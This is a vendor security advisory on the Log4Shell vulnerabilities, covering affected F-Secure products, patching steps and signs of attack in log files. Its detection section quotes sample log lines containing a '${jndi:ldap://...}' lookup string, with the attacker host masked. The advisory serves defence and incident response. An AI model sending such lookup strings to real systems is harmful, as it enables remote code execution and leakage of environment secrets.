The Log4J Vulnerabilities (CVE-2021-44228 / CVE-2021-45046) – which F-Secure products are affected, what it means, what steps should you take - F-Secure Community
<main> <article class="userContent"> <p><strong>Note: </strong>This article will be updated as more information becomes available. We recommend you check back from time to time.</p><p><strong>Update 2021-12-22: </strong>F-Secure Policy Manager 15.30 has been released, which includes a revised Java Runtime Environment which addresses these issues without the need to patch. Customers are advised to take this into use at their earliest opportunity.</p><p><strong>Update 2022-01-19:</strong> We have now published hotfixes for all supported versions of Policy Manager, which bring an updated version of Log4J. These can be found at our <a href="https://www.f-secure.com/en/business/support-and-downloads" rel="nofollow noreferrer ugc">Support and Downloads</a> pages. <strong>NOTE:</strong> if you already patched following the instructions below "How to patch..." then there is no critical need to apply this patch. We have issued this patch with an updated version, as some third-party scanning tools did not recognize our earlier patch as fixing the vulnerabilities, as they relied on a simple version check.</p><h2 data-id="background"><strong>Background</strong></h2><p>During the early hours of 2021-12-10 (UTC+0), <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228" rel="nofollow noreferrer ugc">a vulnerability (CVE-2021-44228) was announced</a> in the widely used Log4J library. This library is used by many software vendors and service providers globally as a standardized way of handling log messages within software.</p><p>Like many other organizations, F-Secure immediately began to investigate which of our services and products might be affected.</p><p>Additionally, on 2021-12-14 (UTC+0), <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046" rel="nofollow noreferrer ugc">a further vulnerability (CVE-2021-45046)</a> was announced in the same library. Naturally, we are investigating this vulnerability too. We will update this page with more information as it becomes available</p><h2 data-id="what-is-the-impact-of-the-vulnerability"><strong>What is the impact of the vulnerability</strong></h2><p>The vulnerability allows an attacker to cause the target system to fetch and execute code from a remote location controlled by the attacker. The second stage - what the downloaded malicious code does next - is fully up to the attacker.</p><h2 data-id="what-f-secure-products-are-affected"><strong>What F-Secure products are affected</strong></h2><p>We have identified that <strong>only</strong> the following F-Secure products are affected by vulnerability CVE-2021-44228:</p><ul><li>F-Secure Policy Manager<ul><li><strong>Note</strong>: Only the Policy Manager Server component is affected. Standalone installations of Policy Manager Console are not affected.</li></ul></li><li>F-Secure Policy Manager Proxy</li><li>F-Secure Endpoint Proxy</li><li>F-Secure Elements Connector</li><li>F-Secure Messaging Security Gateway</li></ul><p>Other F-Secure products are <strong>NOT</strong> affected</p><p>Please read on to see what steps are needed to address these issues.</p><h2 data-id="how-to-check-my-f-secure-elements-connector">How to check my F-Secure Elements Connector</h2><p><strong>Update: </strong>Elements Connector has now been updated via the channel to a fixed version, and there is no need to manually apply the patch.</p><p>To check if you have the latest version, please check the following</p><p><strong>Linux/RPM</strong>:</p><pre class="code codeBlock" spellcheck="false" tabindex="0">Execute Command: rpm -qa f-secure-elements-connector This will return something similar to : f-secure-elements-connector-21.49.96235-1.x86_64 </pre><p><strong>Linux/DEB</strong>: </p><pre class="code codeBlock" spellcheck="false" tabindex="0">Execute Command: dpkg -l f-secure-elements-connector (use lower case L) This will return something similar to : ii f-secure-elements-connector 21.49.96235 </pre><p><strong>Windows</strong>:</p><p>Check the version in Windows "Apps and Features"</p><p>In all cases, if the version reported is 21.49.96235 or greater, you have the fixed version</p><h2 data-id="how-to-patch-my-f-secure-policy-manager-policy-manager-proxy-endpoint-proxy"><strong>How to patch my F-Secure Policy Manager / Policy Manager Proxy / Endpoint Proxy </strong></h2><p>Both Windows and Linux versions of these products should be considered affected. </p><p><strong>Update: </strong>These products are <strong>not</strong> vulnerable to CVE-2021-45046, but <strong>must</strong> still be patched for CVE-2021-44228</p><p><br></p><p>Instructions are common for all the above products. </p><p><strong>Note:</strong> the patch needs to be (re-)applied after new installation or upgrade, until we get fixed installers available.We have created a deployable security patch for this vulnerability. Please follow the following steps to patch your installations:</p><p><strong>Note:</strong> The paths given below are suitable for an installation to the standard location. If you have chosen a custom path during installation, these will need to be adjusted accordingly.</p><ul><li>Download <a href="https://download.f-secure.com/corpro/pm/commons-java-log4j-nolookups.jar" rel="nofollow noreferrer ugc">the patch from the F-Secure server</a> <ul><li>The SHA256 hash of the file should be checked to verify its integrity. It should be 64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0 </li></ul></li><li>Stop the <strong>Policy Manager Server</strong> service<ul><li>Windows: <strong>net stop fsms</strong></li><li>Linux: Service name is <strong>fspms</strong>, the actual command to stop the service may vary with the operating system version. Refer to release notes.</li></ul></li><li>Copy the downloaded file to the correct location:<ul><li>For Windows the exact location depends on the product installed:<ul><li>Policy Manager, Policy Manager Proxy or F-Secure Endpoint Proxy<ul><li>C:\Program Files (x86)\F-Secure\Management Server 5\lib\</li><li><strong>Note: </strong>this is the only location where the patch is needed</li></ul></li><li>For Linux the location is simpler, as all affected products use the same:<ul><li><strong>Note: </strong>this is the only location where the patch is needed</li><li>/opt/f-secure/fspms/lib </li></ul></li></ul></li></ul></li><li>Start the <strong>Policy Manager Server</strong> service<ul><li>Linux: Service name is <strong>fspms, </strong>the actual command to start the service may vary with the operating system version. Refer to release notes.</li><li>Windows: <strong>net start fsms</strong></li></ul></li></ul><p> As the service starts, the patch will be automatically taken into use.</p><p><strong>Note</strong>: This patch applies to all versions of the affected software from 13.10 onwards. Customers using earlier versions than this MUST upgrade to the latest supported version, as their version is incompatible with the patch and versions below 14 are out of support.</p><p><strong>Update:</strong> We have created an easy to use tool that can be used to verify if the patches have been applied: You can find it <a href="https://download.f-secure.com/corpro/pm/f-secure_log4j_howtoverifypatch.zip" rel="nofollow noreferrer ugc">here</a>.</p><h2 data-id="how-to-patch-my-f-secure-messaging-security-gateway"><strong>How to patch my F-Secure Messaging Security Gateway</strong></h2><p>In most cases, F-Secure has automatically patched the Messaging Security Gateway installations.</p><p>However, some customers may have set the system so that they apply the patches manually. In this case the administrator will receive an email informing them of the patch availability, and they should immediately apply the patches.</p><p>The following patches have been released by F-Secure to address these vulnerabilities:</p><ul><li>4312 8.17 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4311 8.15 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4310 8.16 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4309 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4308 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4307 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4303 8.12 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4302 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4301 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4300 8.15 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4299 8.14 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4298 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4295 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4294 8.17 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4293 8.16 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4291 8.18 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4290 8.18 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4257 8.18 CVE-2021-40438 Apache security fix</li><li>4256 8.17 CVE-2021-40438 Apache security fix</li><li>4255 8.16 CVE-2021-40438 Apache security fix</li><li>4254 8.13 CVE-2021-40438 Apache security fix</li><li>4335 8.15.00 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4334 8.16.02 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4333 8.12.04 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4332 8.13.10 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4331 8.13.06 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4330 8.15.02 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4329 8.14.02 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4328 8.13.14 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4327 8.13.08 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4326 8.13.20 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4325 8.13.18 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4324 8.17.04 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4323 8.16.04 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4322 8.13.22 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4321 8.18.02 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4320 8.18.00 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4313 8.13.14 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4336 8.17.02 Log4j (log4Shell) CVE-2021-45046 security fix</li></ul><p><br></p><h2 data-id="how-to-check-if-my-f-secure-product-has-been-attacked"><strong>How to check if my F-Secure product has been attacked</strong></h2><p>Logfiles may help in detecting an attack. Please be aware these are only <strong>examples</strong> and different entries may be relevant instead. The log files are rotated after they reach 15 megabytes, and 50 such rotated logs are kept. </p><p>The relevant parts in the examples below are the parts related to "<strong>jndi</strong>" and "<strong>ldap</strong>".</p><p>Example from <strong>fspms-log4j-internal.log</strong> (Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\fspms-log4j-internal.log):</p><pre class="code codeBlock" spellcheck="false" tabindex="0">11.12.2021 09:43:23,525 INFO [log4jInternalLog] - [WARN] Error looking up JNDI resource [ldap://xxx.xxx.xxx.xxx:xxxx/abc]. 11.12.2021 09:43:23,525 ERROR [log4jInternalLog] - log4j error javax.naming.NamingException: LDAP connection has been closed </pre><p>Example from <strong>request.log </strong>(Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\request.log):</p><pre class="code codeBlock" spellcheck="false" tabindex="0"> 0:0:0:0:0:0:0:1 - - [11/Dec/2021:07:49:38 +0100] "GET / HTTP/1.1" 200 1995 "-" "${jndi:ldap://xxx.xxx.xxx.xxx:xxxx/abc}" 0 "-" 3090 "-" "DONE" </pre><p>It is not possible to give a wide range of examples, as new variants of the exploit are constantly being created and they will cause log messages which differ from above examples.</p><p>The initial exploit attempts may also have been obfuscated. Some basic obfuscations can be bypassed with a clever regular expression. An example collection of useful searches can be found at <a href="https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b" rel="nofollow noreferrer ugc">https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b</a> .</p><p>The second stage of the attack is fully dependent on what code is fetched from the remote location by the initial log4j exploit, and no good indicators of compromise can be singled out for them.</p><p>The attack may also leak environment variables from the targeted system. If the exploit URL contains the name of such a variable, log4j resolves the value and places it into the outgoing URL.</p><p><strong>Note: </strong>After patching, jndi will still appear in the request.log, as this particular log records all incoming requests. This is by design, as it is important the Administrator can see all the incoming requests.</p><h2 data-id="what-protection-does-f-secure-provide-against-this-vulnerability"><strong>What protection does F-Secure provide against this vulnerability</strong></h2><p>Our Endpoint Protection (EPP) is continuously updated with detections for the latest local exploit files, but given the many ways in which exploitation can happen, this only covers part of the problem.</p><p>EPP detections will address any payload seen in post-exploitation phase as usual, and at this point in time, we have the following detections in place that address some serious attack scenarios. These represents malicious payloads that we have seen ”in the wild” in connection with Log4j exploits.</p><ul><li>TR/Drop.Cobacis.AL</li><li>TR/Rozena.wrdej</li><li>TR/PShell.Agent.SWR</li><li>TR/Coblat.G1</li><li>TR/AD.MeterpreterSC.rywng</li></ul><p>Many of these detections have been in available in our EPP for months already, meaning that our customers are proactively protected from this kind of payloads.</p><p>Other detections present may also help, as there are multiple ways to use the exploit. We will update the list of useful detections as the situation evolves.</p><p>Our Endpoint Detection and Response (EDR) capabilities are effective independently from this specific vulnerability and malicious activities, particularly those related to post-exploitation, will be detected as normal. We will keep adding new detections on the basis of what we see.</p><p>F-Secure Elements Vulnerability Management is being constantly updated to add detections, and we have <a href="https://community.f-secure.com/vulnerability-management-en/kb/articles/9227-f-secure-elements-vulnerability-management-can-it-detect-cve-2021-44228-log4j2" rel="nofollow noreferrer ugc">a separate page</a> detailing the current status. This will be updated as new detections are available.</p><p>Please also check the recommendations below in the following section.</p><h2 data-id="what-steps-should-you-take-in-general-(applies-to-all-software-regardless-of-vendor)"><strong>What steps should you take in general (applies to all software, regardless of vendor)</strong></h2><ul><li>Restrict network access, or limit it to trusted sites. If your system cannot connect to Internet to fetch the malicious code, the attack will fail.</li><li>Check regularly with vendors to see if there is information on patches and other mitigations related to vulnerabilities.</li><li>Check your systems daily for updates, and apply any available as soon as possible.</li><li>Subscribe to reputable Security Bulletins</li><li>Consider <a href="https://www.f-secure.com/en/business/solutions/elements-vulnerability-management" rel="nofollow noreferrer ugc">F-Secure Elements Vulnerability Management</a>, which can help identify vulnerable systems. We have produced a <a href="https://www.f-secure.com/en/business/resources/what-is-log4shell-vulnerability" rel="nofollow noreferrer ugc">comprehensive guide</a> which explains more.</li><li>Consider <a href="https://www.f-secure.com/en/business/solutions/elements-endpoint-protection" rel="nofollow noreferrer ugc">F-Secure Elements Endpoint Protection</a> or <a href="https://www.f-secure.com/en/business/solutions/endpoint-security/business-suite" rel="nofollow noreferrer ugc">F-Secure Business Suite</a> products, which can detect <a href="https://www.f-secure.com/en/business/solutions/vulnerability-management/software-updater" rel="nofollow noreferrer ugc">and patch vulnerable software</a> on the system they are installed to.</li></ul><h2 data-id="further-reading"><strong>Further Reading</strong></h2><p>Our F-Secure Consulting Incident Response team has also created <a href="https://www.f-secure.com/en/consulting/our-thinking/f-secure-incident-response-guidance-log4j-2-vulnerability" rel="nofollow noreferrer ugc">a post</a> with some additional information on the vulnerability.</p><h2 data-id="other-useful-links"><strong>Other useful links</strong></h2><p>SwitHak has created a useful page that collates various articles related to this vulnerability: <a href="https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592" rel="nofollow noreferrer ugc">https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592</a></p> </article> </main>